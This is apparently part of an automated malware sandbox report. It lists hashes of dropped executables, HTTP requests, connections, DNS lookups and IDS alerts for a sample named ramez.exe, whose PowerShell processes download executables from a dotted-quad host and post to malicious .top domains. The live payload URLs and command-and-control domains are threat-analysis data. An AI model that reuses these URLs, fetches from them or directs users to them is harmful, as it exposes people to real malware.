MD5:9DD14457B2F0DD3706B18C8A5BEAEBA0
SHA256:5A6FC4B1ACDFF04AF126A64FE6D332F34C29EB2B9725414D859C1BB4DBED21D8
4040ramez.exeC:\Users\admin\AppData\Local\Temp\10118840101\85ea4c301e.exeexecutable
MD5:0C8CC405EAC964A742A3E34FB6E8A322
SHA256:75FE14F74E9505CBB75A50344A9887BD89905511473F48C09AF5220962A2E427
572885ea4c301e.exeC:\Users\admin\AppData\Local\Temp\Work\cecho.exeexecutable
MD5:E783BC59D0ED6CFBD8891F94AE23D1B3
SHA256:5C1211559DDA10592CFEDD57681F18F4A702410816D36EDA95AEE6C74E3C6A47
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
496
TCP/UDP connections
226
DNS requests
141
Threats
126

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
200
104.21.71.199:443
https://pomelohgj.top/uiads
unknown
binary
60 b
malicious
4040
ramez.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/740061926/ra02W4S.exe
unknown
unknown
POST
200
172.67.150.184:443
https://overcovtcg.top/juhd
unknown
binary
38.0 Kb
malicious
POST
200
172.67.171.157:443
https://pomelohgj.top/uiads
unknown
binary
60 b
malicious
2104
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4880
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
4040
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
8016
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
4040
ramez.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/unique2/random.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2104
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
2104
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
unknown
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
8016
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4880
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
pomelohgj.top
  • 104.21.71.199
  • 172.67.171.157
unknown
ninepicchf.bet
malicious
voznessxyy.life
malicious
zmedtipp.live
malicious
interpwthc.digital
malicious
clatteqrpq.digital
malicious

Threats

PID
Process
Class
Message
8016
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 34
8016
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
8016
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
8016
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
8016
powershell.exe
Misc activity
ET INFO Packed Executable Download
8016
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
4880
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
4880
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
4880
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4880
powershell.exe
Misc activity
ET INFO Packed Executable Download
No debug info